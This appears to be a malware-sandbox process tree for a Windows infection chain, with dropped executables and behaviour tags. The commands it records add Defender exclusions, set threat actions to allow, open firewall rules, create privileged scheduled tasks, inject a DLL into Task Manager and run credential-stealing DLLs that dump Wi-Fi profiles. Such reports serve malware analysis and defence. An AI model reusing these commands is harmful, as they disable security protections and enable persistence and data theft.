    - - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
        5⤵
        UAC bypass
        Windows security bypass
        Checks computer location settings
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:908
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4208
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        6⤵
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        
        PID:2480
        
        C:\Users\Admin\Pictures\a79JnNuNzqZp5ApQRi0Y0y5O.exe
        
        "C:\Users\Admin\Pictures\a79JnNuNzqZp5ApQRi0Y0y5O.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:944
        
        C:\Users\Admin\AppData\Local\Temp\uq8.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uq8.0.exe"
        8⤵
        Executes dropped EXE
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\uq8.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uq8.1.exe"
        8⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:6008
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:6004
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 1196
        8⤵
        Program crash
        
        PID:5344
        
        C:\Users\Admin\Pictures\SctKmdEkHmvBwpXSoPgIH7bV.exe
        
        "C:\Users\Admin\Pictures\SctKmdEkHmvBwpXSoPgIH7bV.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5828
        
        C:\Users\Admin\Pictures\SctKmdEkHmvBwpXSoPgIH7bV.exe
        
        "C:\Users\Admin\Pictures\SctKmdEkHmvBwpXSoPgIH7bV.exe"
        8⤵
        Executes dropped EXE
        
        PID:6956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:5156
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4672
        
        C:\Users\Admin\Pictures\P8c6wHxJDJzuFl8waXLj8liZ.exe
        
        "C:\Users\Admin\Pictures\P8c6wHxJDJzuFl8waXLj8liZ.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5764
        
        C:\Users\Admin\Pictures\P8c6wHxJDJzuFl8waXLj8liZ.exe
        
        "C:\Users\Admin\Pictures\P8c6wHxJDJzuFl8waXLj8liZ.exe"
        8⤵
        Executes dropped EXE
        
        PID:6988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:1704
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:4120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:680
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        9⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4304
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:6728
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        10⤵
        
        PID:1624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1036
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        10⤵
        
        PID:2500
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:3788
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        10⤵
        
        PID:6524
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        11⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        12⤵
        Launches sc.exe
        
        PID:2588
        
        C:\Users\Admin\Pictures\yR82Qr77psHhbzwPW9LtEJ9J.exe
        
        "C:\Users\Admin\Pictures\yR82Qr77psHhbzwPW9LtEJ9J.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5804
        
        C:\Users\Admin\Pictures\yR82Qr77psHhbzwPW9LtEJ9J.exe
        
        "C:\Users\Admin\Pictures\yR82Qr77psHhbzwPW9LtEJ9J.exe"
        8⤵
        Executes dropped EXE
        
        PID:6996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:4940
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:4004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5524
        
        C:\Users\Admin\Pictures\mdoway0zzKHieiq6eEa8XdGf.exe
        
        "C:\Users\Admin\Pictures\mdoway0zzKHieiq6eEa8XdGf.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5772
        
        C:\Users\Admin\Pictures\mdoway0zzKHieiq6eEa8XdGf.exe
        
        "C:\Users\Admin\Pictures\mdoway0zzKHieiq6eEa8XdGf.exe"
        8⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:6976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:5180
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:2696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6092
        
        C:\Users\Admin\Pictures\06AAYpD6tWcJNylgsNUdxSpK.exe
        
        "C:\Users\Admin\Pictures\06AAYpD6tWcJNylgsNUdxSpK.exe"
        7⤵
        Modifies firewall policy service
        Windows security bypass
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4480
        
        C:\Users\Admin\Pictures\dnYSGNz52jOwuc5LtoZocMHi.exe
        
        "C:\Users\Admin\Pictures\dnYSGNz52jOwuc5LtoZocMHi.exe"
        7⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\7zSD339.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:5160
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:3992
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:6452
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:2408
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:5100
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:6872
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:3504
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:5644
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6084
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:6020
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:6848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5164
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:5216
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 13:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD339.tmp\Install.exe\" it /sHmdidLkAG 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:5688
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:5820
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:1560
        
        C:\Users\Admin\Pictures\NWobhHQBQEgJm42mbPflNJWm.exe
        
        "C:\Users\Admin\Pictures\NWobhHQBQEgJm42mbPflNJWm.exe"
        7⤵
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\7zS716D.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:2244
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:6400
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:6028
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:3660
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:5808
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:6244
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:5348
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:5196
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:6276
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:2508
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:372
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5976
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:7048
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        6⤵
        
        PID:2528
    - - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1064
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1180
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:2776
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4928
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        
        PID:4744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\775195409080_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:908
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:5208
    - - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5472
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Checks computer location settings
        
        PID:5744
        
        C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4036
        
        C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5792
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        7⤵
        
        PID:208
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:5176
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5472 -s 240
        6⤵
        Program crash
        
        PID:6032
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
        5⤵
        
        PID:2244
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        
        PID:6904
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:6000
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        
        PID:6204
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:5760
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        
        PID:5856
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        
        PID:2500
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        
        PID:5136
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
        6⤵
        
        PID:5280
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClientC
        7⤵
        Launches sc.exe
        
        PID:5168
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
